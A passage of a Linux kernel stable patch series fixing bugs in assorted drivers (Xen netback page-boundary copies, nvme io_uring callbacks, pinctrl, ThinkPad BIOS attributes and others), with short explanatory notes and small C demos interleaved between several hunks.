+ 	return ERR_PTR(ret);
+diff --git a/drivers/net/ethernet/ti/am65-cpts.h b/drivers/net/ethernet/ti/am65-cpts.h
+index cf9fbc28fd032..c0ae0117e5737 100644
+--- a/drivers/net/ethernet/ti/am65-cpts.h
++++ b/drivers/net/ethernet/ti/am65-cpts.h
+@@ -18,6 +18,7 @@ struct am65_cpts_estf_cfg {
+ };
+ 
+ #if IS_ENABLED(CONFIG_TI_K3_AM65_CPTS)
++void am65_cpts_release(struct am65_cpts *cpts);
+ struct am65_cpts *am65_cpts_create(struct device *dev, void __iomem *regs,
+ 				   struct device_node *node);
+ int am65_cpts_phc_index(struct am65_cpts *cpts);
+@@ -29,6 +30,10 @@ int am65_cpts_estf_enable(struct am65_cpts *cpts, int idx,
+ 			  struct am65_cpts_estf_cfg *cfg);
+ void am65_cpts_estf_disable(struct am65_cpts *cpts, int idx);
+ #else
++static inline void am65_cpts_release(struct am65_cpts *cpts)
++{
++}
++
+ static inline struct am65_cpts *am65_cpts_create(struct device *dev,
+ 						 void __iomem *regs,
+ 						 struct device_node *node)
+diff --git a/drivers/net/ieee802154/ca8210.c b/drivers/net/ieee802154/ca8210.c
+index 0b0c6c0764fe9..d0b5129439ed6 100644
+--- a/drivers/net/ieee802154/ca8210.c
++++ b/drivers/net/ieee802154/ca8210.c
+@@ -1902,10 +1902,9 @@ static int ca8210_skb_tx(
+ 	struct ca8210_priv  *priv
+ )
+ {
+-	int status;
+ 	struct ieee802154_hdr header = { };
+ 	struct secspec secspec;
+-	unsigned int mac_len;
++	int mac_len, status;
+ 
+ 	dev_dbg(&priv->spi->dev, "%s called\n", __func__);
+ 
+diff --git a/drivers/net/ipa/gsi_trans.c b/drivers/net/ipa/gsi_trans.c
+index 26b7f683a3e17..fa6863c265eb9 100644
+--- a/drivers/net/ipa/gsi_trans.c
++++ b/drivers/net/ipa/gsi_trans.c
+@@ -153,7 +153,7 @@ int gsi_trans_pool_init_dma(struct device *dev, struct gsi_trans_pool *pool,
+ 	 * gsi_trans_pool_exit_dma() can assume the total allocated
+ 	 * size is exactly (count * size).
+ 	 */
+-	total_size = get_order(total_size) << PAGE_SHIFT;
++	total_size = PAGE_SIZE << get_order(total_size);
+ 
+ 	virt = dma_alloc_coherent(dev, total_size, &addr, GFP_KERNEL);
+ 	if (!virt)
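
The gsi_trans fix above corrects how the pool size is rounded up to a whole page-order allocation. get_order(sz) yields the order n with (PAGE_SIZE << n) >= sz, so the allocated size is PAGE_SIZE << order; the old expression, order << PAGE_SHIFT, is merely order * PAGE_SIZE and badly undercounts. A userspace model with 4 KiB pages assumed (the kernel's get_order has the same contract for nonzero sizes):

#include <stdio.h>

#define PAGE_SHIFT	12
#define PAGE_SIZE	(1UL << PAGE_SHIFT)

static unsigned int get_order(unsigned long size)
{
	unsigned int order = 0;

	while ((PAGE_SIZE << order) < size)
		order++;

	return order;
}

int main(void)
{
	unsigned long size = 3 * PAGE_SIZE + 1;	/* needs order 2 */
	unsigned int order = get_order(size);

	printf("right: %lu bytes\n", PAGE_SIZE << order);		  /* 16384 */
	printf("wrong: %lu bytes\n", (unsigned long)order << PAGE_SHIFT); /* 8192 */
	return 0;
}
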
+diff --git a/drivers/net/net_failover.c b/drivers/net/net_failover.c
+index 7a28e082436e4..d0c916a53d7ce 100644
+--- a/drivers/net/net_failover.c
++++ b/drivers/net/net_failover.c
+@@ -130,14 +130,10 @@ static u16 net_failover_select_queue(struct net_device *dev,
+ 			txq = ops->ndo_select_queue(primary_dev, skb, sb_dev);
+ 		else
+ 			txq = netdev_pick_tx(primary_dev, skb, NULL);
+-
+-		qdisc_skb_cb(skb)->slave_dev_queue_mapping = skb->queue_mapping;
+-
+-		return txq;
++	} else {
++		txq = skb_rx_queue_recorded(skb) ? skb_get_rx_queue(skb) : 0;
+ 	}
+ 
+-	txq = skb_rx_queue_recorded(skb) ? skb_get_rx_queue(skb) : 0;
+-
+ 	/* Save the original txq to restore before passing to the driver */
+ 	qdisc_skb_cb(skb)->slave_dev_queue_mapping = skb->queue_mapping;
+ 
+diff --git a/drivers/net/phy/dp83869.c b/drivers/net/phy/dp83869.c
+index b4ff9c5073a3c..9ab5eff502b71 100644
+--- a/drivers/net/phy/dp83869.c
++++ b/drivers/net/phy/dp83869.c
+@@ -588,15 +588,13 @@ static int dp83869_of_init(struct phy_device *phydev)
+ 						       &dp83869_internal_delay[0],
+ 						       delay_size, true);
+ 	if (dp83869->rx_int_delay < 0)
+-		dp83869->rx_int_delay =
+-				dp83869_internal_delay[DP83869_CLK_DELAY_DEF];
++		dp83869->rx_int_delay = DP83869_CLK_DELAY_DEF;
+ 
+ 	dp83869->tx_int_delay = phy_get_internal_delay(phydev, dev,
+ 						       &dp83869_internal_delay[0],
+ 						       delay_size, false);
+ 	if (dp83869->tx_int_delay < 0)
+-		dp83869->tx_int_delay =
+-				dp83869_internal_delay[DP83869_CLK_DELAY_DEF];
++		dp83869->tx_int_delay = DP83869_CLK_DELAY_DEF;
+ 
+ 	return ret;
+ }
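
The dp83869 defaults above are table indices, not delay values: the rx/tx fields are later used to index the internal-delay lookup table, so the fallback must be DP83869_CLK_DELAY_DEF itself rather than the picosecond entry stored at that index. A sketch of the distinction, with illustrative table contents:

#include <stdio.h>

static const int delay_ps[] = { 250, 500, 750, 1000, 1250, 1500, 1750, 2000 };

#define CLK_DELAY_DEF	7	/* index of the default entry */

int main(void)
{
	int idx_ok = CLK_DELAY_DEF;		/* later lookup gives 2000 ps */
	int idx_bad = delay_ps[CLK_DELAY_DEF];	/* 2000: nonsense as an index */

	printf("ok:  delay_ps[%d] = %d ps\n", idx_ok, delay_ps[idx_ok]);
	printf("bad: index %d into an 8-entry table\n", idx_bad);
	return 0;
}
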
+diff --git a/drivers/net/vmxnet3/vmxnet3_drv.c b/drivers/net/vmxnet3/vmxnet3_drv.c
+index 682987040ea82..da488cbb05428 100644
+--- a/drivers/net/vmxnet3/vmxnet3_drv.c
++++ b/drivers/net/vmxnet3/vmxnet3_drv.c
+@@ -1688,7 +1688,9 @@ not_lro:
+ 			if (unlikely(rcd->ts))
+ 				__vlan_hwaccel_put_tag(skb, htons(ETH_P_8021Q), rcd->tci);
+ 
+-			if (adapter->netdev->features & NETIF_F_LRO)
++			/* Use GRO callback if UPT is enabled */
++			if ((adapter->netdev->features & NETIF_F_LRO) &&
++			    !rq->shared->updateRxProd)
+ 				netif_receive_skb(skb);
+ 			else
+ 				napi_gro_receive(&rq->napi, skb);
+diff --git a/drivers/net/xen-netback/common.h b/drivers/net/xen-netback/common.h
+index 3dbfc8a6924ed..1fcbd83f7ff2e 100644
+--- a/drivers/net/xen-netback/common.h
++++ b/drivers/net/xen-netback/common.h
+@@ -166,7 +166,7 @@ struct xenvif_queue { /* Per-queue data for xenvif */
+ 	struct pending_tx_info pending_tx_info[MAX_PENDING_REQS];
+ 	grant_handle_t grant_tx_handle[MAX_PENDING_REQS];
+ 
+-	struct gnttab_copy tx_copy_ops[MAX_PENDING_REQS];
++	struct gnttab_copy tx_copy_ops[2 * MAX_PENDING_REQS];
+ 	struct gnttab_map_grant_ref tx_map_ops[MAX_PENDING_REQS];
+ 	struct gnttab_unmap_grant_ref tx_unmap_ops[MAX_PENDING_REQS];
+ 	/* passed to gnttab_[un]map_refs with pages under (un)mapping */
+diff --git a/drivers/net/xen-netback/netback.c b/drivers/net/xen-netback/netback.c
+index bf627af723bf9..5c266062c08f0 100644
+--- a/drivers/net/xen-netback/netback.c
++++ b/drivers/net/xen-netback/netback.c
+@@ -334,6 +334,7 @@ static int xenvif_count_requests(struct xenvif_queue *queue,
+ struct xenvif_tx_cb {
+ 	u16 copy_pending_idx[XEN_NETBK_LEGACY_SLOTS_MAX + 1];
+ 	u8 copy_count;
++	u32 split_mask;
+ };
+ 
+ #define XENVIF_TX_CB(skb) ((struct xenvif_tx_cb *)(skb)->cb)
+@@ -361,6 +362,8 @@ static inline struct sk_buff *xenvif_alloc_skb(unsigned int size)
+ 	struct sk_buff *skb =
+ 		alloc_skb(size + NET_SKB_PAD + NET_IP_ALIGN,
+ 			  GFP_ATOMIC | __GFP_NOWARN);
++
++	BUILD_BUG_ON(sizeof(*XENVIF_TX_CB(skb)) > sizeof(skb->cb));
+ 	if (unlikely(skb == NULL))
+ 		return NULL;
+ 
+@@ -396,11 +399,13 @@ static void xenvif_get_requests(struct xenvif_queue *queue,
+ 	nr_slots = shinfo->nr_frags + 1;
+ 
+ 	copy_count(skb) = 0;
++	XENVIF_TX_CB(skb)->split_mask = 0;
+ 
+ 	/* Create copy ops for exactly data_len bytes into the skb head. */
+ 	__skb_put(skb, data_len);
+ 	while (data_len > 0) {
+ 		int amount = data_len > txp->size ? txp->size : data_len;
++		bool split = false;
+ 
+ 		cop->source.u.ref = txp->gref;
+ 		cop->source.domid = queue->vif->domid;
+@@ -413,6 +418,13 @@ static void xenvif_get_requests(struct xenvif_queue *queue,
+ 		cop->dest.u.gmfn = virt_to_gfn(skb->data + skb_headlen(skb)
+ 				               - data_len);
+ 
++		/* Don't cross local page boundary! */
++		if (cop->dest.offset + amount > XEN_PAGE_SIZE) {
++			amount = XEN_PAGE_SIZE - cop->dest.offset;
++			XENVIF_TX_CB(skb)->split_mask |= 1U << copy_count(skb);
++			split = true;
++		}
++
+ 		cop->len = amount;
+ 		cop->flags = GNTCOPY_source_gref;
+ 
+@@ -420,7 +432,8 @@ static void xenvif_get_requests(struct xenvif_queue *queue,
+ 		pending_idx = queue->pending_ring[index];
+ 		callback_param(queue, pending_idx).ctx = NULL;
+ 		copy_pending_idx(skb, copy_count(skb)) = pending_idx;
+-		copy_count(skb)++;
++		if (!split)
++			copy_count(skb)++;
+ 
+ 		cop++;
+ 		data_len -= amount;
+@@ -441,7 +454,8 @@ static void xenvif_get_requests(struct xenvif_queue *queue,
+ 			nr_slots--;
+ 		} else {
+ 			/* The copy op partially covered the tx_request.
+-			 * The remainder will be mapped.
++			 * The remainder will be mapped or copied in the next
++			 * iteration.
+ 			 */
+ 			txp->offset += amount;
+ 			txp->size -= amount;
+@@ -539,6 +553,13 @@ static int xenvif_tx_check_gop(struct xenvif_queue *queue,
+ 		pending_idx = copy_pending_idx(skb, i);
+ 
+ 		newerr = (*gopp_copy)->status;
++
++		/* Split copies need to be handled together. */
++		if (XENVIF_TX_CB(skb)->split_mask & (1U << i)) {
++			(*gopp_copy)++;
++			if (!newerr)
++				newerr = (*gopp_copy)->status;
++		}
+ 		if (likely(!newerr)) {
+ 			/* The first frag might still have this slot mapped */
+ 			if (i < copy_count(skb) - 1 || !sharedslot)
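
The netback changes above let one tx request become two grant-copy ops when the destination range would cross a local (Xen) page boundary; the new split_mask bit records that such a pair shares one pending slot, so completion checks both statuses. The clamp itself is plain arithmetic, sketched here with a 4 KiB XEN_PAGE_SIZE:

#include <stdio.h>

#define XEN_PAGE_SIZE	4096u

int main(void)
{
	unsigned int dest_off = 4000, len = 300;	/* crosses the page edge */
	unsigned int first = len, split = 0;

	if (dest_off + first > XEN_PAGE_SIZE) {
		first = XEN_PAGE_SIZE - dest_off;	/* clamp at the boundary */
		split = 1;				/* tail goes in a second op */
	}

	printf("op1: off=%u len=%u%s\n", dest_off, first, split ? " (split)" : "");
	if (split)
		printf("op2: off=0 len=%u\n", len - first);

	return 0;
}
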
+diff --git a/drivers/nvme/host/ioctl.c b/drivers/nvme/host/ioctl.c
+index 81f5550b670da..8224675f8de25 100644
+--- a/drivers/nvme/host/ioctl.c
++++ b/drivers/nvme/host/ioctl.c
+@@ -387,7 +387,8 @@ static inline struct nvme_uring_cmd_pdu *nvme_uring_cmd_pdu(
+ 	return (struct nvme_uring_cmd_pdu *)&ioucmd->pdu;
+ }
+ 
+-static void nvme_uring_task_meta_cb(struct io_uring_cmd *ioucmd)
++static void nvme_uring_task_meta_cb(struct io_uring_cmd *ioucmd,
++				    unsigned issue_flags)
+ {
+ 	struct nvme_uring_cmd_pdu *pdu = nvme_uring_cmd_pdu(ioucmd);
+ 	struct request *req = pdu->req;
+@@ -408,17 +409,18 @@ static void nvme_uring_task_meta_cb(struct io_uring_cmd *ioucmd)
+ 		blk_rq_unmap_user(req->bio);
+ 	blk_mq_free_request(req);
+ 
+-	io_uring_cmd_done(ioucmd, status, result);
++	io_uring_cmd_done(ioucmd, status, result, issue_flags);
+ }
+ 
+-static void nvme_uring_task_cb(struct io_uring_cmd *ioucmd)
++static void nvme_uring_task_cb(struct io_uring_cmd *ioucmd,
++			       unsigned issue_flags)
+ {
+ 	struct nvme_uring_cmd_pdu *pdu = nvme_uring_cmd_pdu(ioucmd);
+ 
+ 	if (pdu->bio)
+ 		blk_rq_unmap_user(pdu->bio);
+ 
+-	io_uring_cmd_done(ioucmd, pdu->nvme_status, pdu->u.result);
++	io_uring_cmd_done(ioucmd, pdu->nvme_status, pdu->u.result, issue_flags);
+ }
+ 
+ static enum rq_end_io_ret nvme_uring_cmd_end_io(struct request *req,
+@@ -440,7 +442,7 @@ static enum rq_end_io_ret nvme_uring_cmd_end_io(struct request *req,
+ 	 * Otherwise, move the completion to task work.
+ 	 */
+ 	if (cookie != NULL && blk_rq_is_poll(req))
+-		nvme_uring_task_cb(ioucmd);
++		nvme_uring_task_cb(ioucmd, IO_URING_F_UNLOCKED);
+ 	else
+ 		io_uring_cmd_complete_in_task(ioucmd, nvme_uring_task_cb);
+ 
+@@ -462,7 +464,7 @@ static enum rq_end_io_ret nvme_uring_cmd_end_io_meta(struct request *req,
+ 	 * Otherwise, move the completion to task work.
+ 	 */
+ 	if (cookie != NULL && blk_rq_is_poll(req))
+-		nvme_uring_task_meta_cb(ioucmd);
++		nvme_uring_task_meta_cb(ioucmd, IO_URING_F_UNLOCKED);
+ 	else
+ 		io_uring_cmd_complete_in_task(ioucmd, nvme_uring_task_meta_cb);
+ 
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index 100f774bc97fa..60452f6a9f711 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -3547,6 +3547,8 @@ static const struct pci_device_id nvme_id_table[] = {
+ 		.driver_data = NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_DEVICE(0x1d97, 0x2263), /* Lexar NM610 */
+ 		.driver_data = NVME_QUIRK_BOGUS_NID, },
++	{ PCI_DEVICE(0x1d97, 0x1d97), /* Lexar NM620 */
++		.driver_data = NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_DEVICE(0x1d97, 0x2269), /* Lexar NM760 */
+ 		.driver_data = NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_AMAZON, 0x0061),
+diff --git a/drivers/pci/controller/dwc/pcie-designware.c b/drivers/pci/controller/dwc/pcie-designware.c
+index 9e4d96e5a3f5a..575834cae3b9e 100644
+--- a/drivers/pci/controller/dwc/pcie-designware.c
++++ b/drivers/pci/controller/dwc/pcie-designware.c
+@@ -645,11 +645,6 @@ void dw_pcie_setup(struct dw_pcie *pci)
+ 		dw_pcie_writel_dbi(pci, PCIE_LINK_WIDTH_SPEED_CONTROL, val);
+ 	}
+ 
+-	val = dw_pcie_readl_dbi(pci, PCIE_PORT_LINK_CONTROL);
+-	val &= ~PORT_LINK_FAST_LINK_MODE;
+-	val |= PORT_LINK_DLL_LINK_EN;
+-	dw_pcie_writel_dbi(pci, PCIE_PORT_LINK_CONTROL, val);
+-
+ 	if (of_property_read_bool(np, "snps,enable-cdm-check")) {
+ 		val = dw_pcie_readl_dbi(pci, PCIE_PL_CHK_REG_CONTROL_STATUS);
+ 		val |= PCIE_PL_CHK_REG_CHK_REG_CONTINUOUS |
+@@ -657,6 +652,11 @@ void dw_pcie_setup(struct dw_pcie *pci)
+ 		dw_pcie_writel_dbi(pci, PCIE_PL_CHK_REG_CONTROL_STATUS, val);
+ 	}
+ 
++	val = dw_pcie_readl_dbi(pci, PCIE_PORT_LINK_CONTROL);
++	val &= ~PORT_LINK_FAST_LINK_MODE;
++	val |= PORT_LINK_DLL_LINK_EN;
++	dw_pcie_writel_dbi(pci, PCIE_PORT_LINK_CONTROL, val);
++
+ 	of_property_read_u32(np, "num-lanes", &pci->num_lanes);
+ 	if (!pci->num_lanes) {
+ 		dev_dbg(pci->dev, "Using h/w default number of lanes\n");
+diff --git a/drivers/pinctrl/pinctrl-amd.c b/drivers/pinctrl/pinctrl-amd.c
+index 32c3edaf90385..5e7b82a2b13d0 100644
+--- a/drivers/pinctrl/pinctrl-amd.c
++++ b/drivers/pinctrl/pinctrl-amd.c
+@@ -865,32 +865,34 @@ static const struct pinconf_ops amd_pinconf_ops = {
+ 	.pin_config_group_set = amd_pinconf_group_set,
+ };
+ 
+-static void amd_gpio_irq_init(struct amd_gpio *gpio_dev)
++static void amd_gpio_irq_init_pin(struct amd_gpio *gpio_dev, int pin)
+ {
+-	struct pinctrl_desc *desc = gpio_dev->pctrl->desc;
++	const struct pin_desc *pd;
+ 	unsigned long flags;
+ 	u32 pin_reg, mask;
+-	int i;
+ 
+ 	mask = BIT(WAKE_CNTRL_OFF_S0I3) | BIT(WAKE_CNTRL_OFF_S3) |
+ 		BIT(INTERRUPT_MASK_OFF) | BIT(INTERRUPT_ENABLE_OFF) |
+ 		BIT(WAKE_CNTRL_OFF_S4);
+ 
+-	for (i = 0; i < desc->npins; i++) {
+-		int pin = desc->pins[i].number;
+-		const struct pin_desc *pd = pin_desc_get(gpio_dev->pctrl, pin);
+-
+-		if (!pd)
+-			continue;
++	pd = pin_desc_get(gpio_dev->pctrl, pin);
++	if (!pd)
++		return;
+ 
+-		raw_spin_lock_irqsave(&gpio_dev->lock, flags);
++	raw_spin_lock_irqsave(&gpio_dev->lock, flags);
++	pin_reg = readl(gpio_dev->base + pin * 4);
++	pin_reg &= ~mask;
++	writel(pin_reg, gpio_dev->base + pin * 4);
++	raw_spin_unlock_irqrestore(&gpio_dev->lock, flags);
++}
+ 
+-		pin_reg = readl(gpio_dev->base + i * 4);
+-		pin_reg &= ~mask;
+-		writel(pin_reg, gpio_dev->base + i * 4);
++static void amd_gpio_irq_init(struct amd_gpio *gpio_dev)
++{
++	struct pinctrl_desc *desc = gpio_dev->pctrl->desc;
++	int i;
+ 
+-		raw_spin_unlock_irqrestore(&gpio_dev->lock, flags);
+-	}
++	for (i = 0; i < desc->npins; i++)
++		amd_gpio_irq_init_pin(gpio_dev, i);
+ }
+ 
+ #ifdef CONFIG_PM_SLEEP
+@@ -943,8 +945,10 @@ static int amd_gpio_resume(struct device *dev)
+ 	for (i = 0; i < desc->npins; i++) {
+ 		int pin = desc->pins[i].number;
+ 
+-		if (!amd_gpio_should_save(gpio_dev, pin))
++		if (!amd_gpio_should_save(gpio_dev, pin)) {
++			amd_gpio_irq_init_pin(gpio_dev, pin);
+ 			continue;
++		}
+ 
+ 		raw_spin_lock_irqsave(&gpio_dev->lock, flags);
+ 		gpio_dev->saved_regs[i] |= readl(gpio_dev->base + pin * 4) & PIN_IRQ_PENDING;
+diff --git a/drivers/pinctrl/pinctrl-at91-pio4.c b/drivers/pinctrl/pinctrl-at91-pio4.c
+index 7f193f2b1566a..0b7cc6f063e00 100644
+--- a/drivers/pinctrl/pinctrl-at91-pio4.c
++++ b/drivers/pinctrl/pinctrl-at91-pio4.c
+@@ -1176,7 +1176,6 @@ static int atmel_pinctrl_probe(struct platform_device *pdev)
+ 		dev_err(dev, "can't add the irq domain\n");
+ 		return -ENODEV;
+ 	}
+-	atmel_pioctrl->irq_domain->name = "atmel gpio";
+ 
+ 	for (i = 0; i < atmel_pioctrl->npins; i++) {
+ 		int irq = irq_create_mapping(atmel_pioctrl->irq_domain, i);
+diff --git a/drivers/pinctrl/pinctrl-ocelot.c b/drivers/pinctrl/pinctrl-ocelot.c
+index 3d5995cbcb782..c1d58939dd89a 100644
+--- a/drivers/pinctrl/pinctrl-ocelot.c
++++ b/drivers/pinctrl/pinctrl-ocelot.c
+@@ -1202,7 +1202,7 @@ static int ocelot_pinmux_set_mux(struct pinctrl_dev *pctldev,
+ 	regmap_update_bits(info->map, REG_ALT(0, info, pin->pin),
+ 			   BIT(p), f << p);
+ 	regmap_update_bits(info->map, REG_ALT(1, info, pin->pin),
+-			   BIT(p), f << (p - 1));
++			   BIT(p), (f >> 1) << p);
+ 
+ 	return 0;
+ }
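
The ocelot pinmux fix above concerns how a 2-bit alternate-function value f is spread across two registers at the same bit position p: ALT0 takes bit 0 of f and ALT1 takes bit 1, so the second write needs (f >> 1) << p. The old f << (p - 1) put the bit in the wrong column and shifted by -1 for pin 0. In miniature:

#include <stdio.h>

int main(void)
{
	unsigned int f = 2, p = 5;	/* function 0b10 on pin bit 5 */
	unsigned int alt0 = (f & 1) << p;	/* bit 0 of f */
	unsigned int alt1 = (f >> 1) << p;	/* bit 1 of f */

	printf("alt0=0x%x alt1=0x%x\n", alt0, alt1);	/* alt0=0x0 alt1=0x20 */
	return 0;
}
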
+diff --git a/drivers/platform/surface/aggregator/bus.c b/drivers/platform/surface/aggregator/bus.c
+index de539938896e2..b501a79f2a08a 100644
+--- a/drivers/platform/surface/aggregator/bus.c
++++ b/drivers/platform/surface/aggregator/bus.c
+@@ -485,8 +485,10 @@ int __ssam_register_clients(struct device *parent, struct ssam_controller *ctrl,
+ 		 * device, so ignore it and continue with the next one.
+ 		 */
+ 		status = ssam_add_client_device(parent, ctrl, child);
+-		if (status && status != -ENODEV)
++		if (status && status != -ENODEV) {
++			fwnode_handle_put(child);
+ 			goto err;
++		}
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/platform/x86/ideapad-laptop.c b/drivers/platform/x86/ideapad-laptop.c
+index 4e28c55f0ea52..bd38c7dcae347 100644
+--- a/drivers/platform/x86/ideapad-laptop.c
++++ b/drivers/platform/x86/ideapad-laptop.c
+@@ -1164,7 +1164,6 @@ static const struct key_entry ideapad_keymap[] = {
+ 	{ KE_KEY,  65, { KEY_PROG4 } },
+ 	{ KE_KEY,  66, { KEY_TOUCHPAD_OFF } },
+ 	{ KE_KEY,  67, { KEY_TOUCHPAD_ON } },
+-	{ KE_KEY,  68, { KEY_TOUCHPAD_TOGGLE } },
+ 	{ KE_KEY, 128, { KEY_ESC } },
+ 
+ 	/*
+@@ -1520,18 +1519,16 @@ static void ideapad_sync_touchpad_state(struct ideapad_private *priv, bool send_
+ 	if (priv->features.ctrl_ps2_aux_port)
+ 		i8042_command(&param, value ? I8042_CMD_AUX_ENABLE : I8042_CMD_AUX_DISABLE);
+ 
+-	if (send_events) {
+-		/*
+-		 * On older models the EC controls the touchpad and toggles it
+-		 * on/off itself, in this case we report KEY_TOUCHPAD_ON/_OFF.
+-		 * If the EC did not toggle, report KEY_TOUCHPAD_TOGGLE.
+-		 */
+-		if (value != priv->r_touchpad_val) {
+-			ideapad_input_report(priv, value ? 67 : 66);
+-			sysfs_notify(&priv->platform_device->dev.kobj, NULL, "touchpad");
+-		} else {
+-			ideapad_input_report(priv, 68);
+-		}
++	/*
++	 * On older models the EC controls the touchpad and toggles it on/off
++	 * itself, in this case we report KEY_TOUCHPAD_ON/_OFF. Some models do
++	 * an acpi-notify with VPC bit 5 set on resume, so this function gets
++	 * called with send_events=true on every resume. Therefore, if the EC did
++	 * not toggle, do nothing to avoid sending spurious KEY_TOUCHPAD_TOGGLE.
++	 */
++	if (send_events && value != priv->r_touchpad_val) {
++		ideapad_input_report(priv, value ? 67 : 66);
++		sysfs_notify(&priv->platform_device->dev.kobj, NULL, "touchpad");
+ 	}
+ 
+ 	priv->r_touchpad_val = value;
+diff --git a/drivers/platform/x86/intel/pmc/core.c b/drivers/platform/x86/intel/pmc/core.c
+index 17ec5825d13d7..be0fb9401202a 100644
+--- a/drivers/platform/x86/intel/pmc/core.c
++++ b/drivers/platform/x86/intel/pmc/core.c
+@@ -958,7 +958,18 @@ static inline void pmc_core_reg_write(struct pmc_dev *pmcdev, int reg_offset,
+ 
+ static inline u64 pmc_core_adjust_slp_s0_step(struct pmc_dev *pmcdev, u32 value)
+ {
+-	return (u64)value * pmcdev->map->slp_s0_res_counter_step;
++	/*
++	 * ADL PCH does not have the SLP_S0 counter and LPM Residency counters are
++	 * used as a workaround which uses 30.5 usec tick. All other client
++	 * programs have the legacy SLP_S0 residency counter that is using the 122
++	 * usec tick.
++	 */
++	const int lpm_adj_x2 = pmcdev->map->lpm_res_counter_step_x2;
++
++	if (pmcdev->map == &adl_reg_map)
++		return (u64)value * GET_X2_COUNTER((u64)lpm_adj_x2);
++	else
++		return (u64)value * pmcdev->map->slp_s0_res_counter_step;
+ }
+ 
+ static int set_etr3(struct pmc_dev *pmcdev)
+diff --git a/drivers/platform/x86/think-lmi.c b/drivers/platform/x86/think-lmi.c
+index a01a92769c1a3..74af3e593b2ca 100644
+--- a/drivers/platform/x86/think-lmi.c
++++ b/drivers/platform/x86/think-lmi.c
+@@ -941,12 +941,23 @@ static ssize_t possible_values_show(struct kobject *kobj, struct kobj_attribute
+ {
+ 	struct tlmi_attr_setting *setting = to_tlmi_attr_setting(kobj);
+ 
+-	if (!tlmi_priv.can_get_bios_selections)
+-		return -EOPNOTSUPP;
+-
+ 	return sysfs_emit(buf, "%s\n", setting->possible_values);
+ }
+ 
++static ssize_t type_show(struct kobject *kobj, struct kobj_attribute *attr,
++		char *buf)
++{
++	struct tlmi_attr_setting *setting = to_tlmi_attr_setting(kobj);
++
++	if (setting->possible_values) {
++		/* Figure out what the setting type is, as BIOS does not return this */
++		if (strchr(setting->possible_values, ';'))
++			return sysfs_emit(buf, "enumeration\n");
++	}
++	/* Anything else is going to be a string */
++	return sysfs_emit(buf, "string\n");
++}
++
+ static ssize_t current_value_store(struct kobject *kobj,
+ 		struct kobj_attribute *attr,
+ 		const char *buf, size_t count)
+@@ -1036,14 +1047,30 @@ static struct kobj_attribute attr_possible_values = __ATTR_RO(possible_values);
+ 
+ static struct kobj_attribute attr_current_val = __ATTR_RW_MODE(current_value, 0600);
+ 
++static struct kobj_attribute attr_type = __ATTR_RO(type);
++
++static umode_t attr_is_visible(struct kobject *kobj,
++					     struct attribute *attr, int n)
++{
++	struct tlmi_attr_setting *setting = to_tlmi_attr_setting(kobj);
++
++	/* We don't want to display possible_values attributes if not available */
++	if ((attr == &attr_possible_values.attr) && (!setting->possible_values))
++		return 0;
++
++	return attr->mode;
++}
++
+ static struct attribute *tlmi_attrs[] = {
+ 	&attr_displ_name.attr,
+ 	&attr_current_val.attr,
+ 	&attr_possible_values.attr,
++	&attr_type.attr,
+ 	NULL
+ };
+ 
+ static const struct attribute_group tlmi_attr_group = {
++	.is_visible = attr_is_visible,
+ 	.attrs = tlmi_attrs,
+ };
+ 
+@@ -1423,7 +1450,34 @@ static int tlmi_analyze(void)
+ 			if (ret || !setting->possible_values)
+ 				pr_info("Error retrieving possible values for %d : %s\n",
+ 						i, setting->display_name);
++		} else {
++			/*
++			 * Older Thinkstations don't support the bios_selections API.
++			 * Instead they store this as a [Optional:Option1,Option2] section of the
++			 * name string.
++			 * Try and pull that out if it's available.
++			 */
++			char *item, *optstart, *optend;
++
++			if (!tlmi_setting(setting->index, &item, LENOVO_BIOS_SETTING_GUID)) {
++				optstart = strstr(item, "[Optional:");
++				if (optstart) {
++					optstart += strlen("[Optional:");
++					optend = strstr(optstart, "]");
++					if (optend)
++						setting->possible_values =
++							kstrndup(optstart, optend - optstart,
++									GFP_KERNEL);
++				}
++			}
+ 		}
++		/*
++		 * firmware-attributes requires that possible_values are separated by ';' but
++		 * Lenovo FW uses ','. Replace appropriately.
++		 */
++		if (setting->possible_values)
++			strreplace(setting->possible_values, ',', ';');
++
+ 		kobject_init(&setting->kobj, &tlmi_attr_setting_ktype);
+ 		tlmi_priv.setting[i] = setting;
+ 		kfree(item);
+diff --git a/drivers/ptp/ptp_qoriq.c b/drivers/ptp/ptp_qoriq.c
+index 08f4cf0ad9e3c..8fa9772acf79b 100644
+--- a/drivers/ptp/ptp_qoriq.c
++++ b/drivers/ptp/ptp_qoriq.c
+@@ -601,7 +601,7 @@ static int ptp_qoriq_probe(struct platform_device *dev)
+ 	return 0;
+ 
+ no_clock:
+-	iounmap(ptp_qoriq->base);
++	iounmap(base);
+ no_ioremap:
+ 	release_resource(ptp_qoriq->rsrc);
+ no_resource:
+diff --git a/drivers/regulator/fixed.c b/drivers/regulator/fixed.c
+index 2a9867abba20c..e6724a229d237 100644
+--- a/drivers/regulator/fixed.c
++++ b/drivers/regulator/fixed.c
+@@ -215,7 +215,7 @@ static int reg_fixed_voltage_probe(struct platform_device *pdev)
+ 		drvdata->enable_clock = devm_clk_get(dev, NULL);
+ 		if (IS_ERR(drvdata->enable_clock)) {
+ 			dev_err(dev, "Can't get enable-clock from devicetree\n");
+-			return -ENOENT;
++			return PTR_ERR(drvdata->enable_clock);
+ 		}
+ 	} else if (drvtype && drvtype->has_performance_state) {
+ 		drvdata->desc.ops = &fixed_voltage_domain_ops;
+diff --git a/drivers/s390/crypto/vfio_ap_drv.c b/drivers/s390/crypto/vfio_ap_drv.c
+index f43cfeabd2cc8..0afceb63ac43c 100644
+--- a/drivers/s390/crypto/vfio_ap_drv.c
++++ b/drivers/s390/crypto/vfio_ap_drv.c
+@@ -54,8 +54,9 @@ static struct ap_driver vfio_ap_drv = {
+ 
+ static void vfio_ap_matrix_dev_release(struct device *dev)
+ {
+-	struct ap_matrix_dev *matrix_dev = dev_get_drvdata(dev);
++	struct ap_matrix_dev *matrix_dev;
+ 
++	matrix_dev = container_of(dev, struct ap_matrix_dev, device);
+ 	kfree(matrix_dev);
+ }
+ 
+diff --git a/drivers/scsi/megaraid/megaraid_sas_fusion.c b/drivers/scsi/megaraid/megaraid_sas_fusion.c
+index 6650f8c8e9b04..af22ffa8f6a25 100644
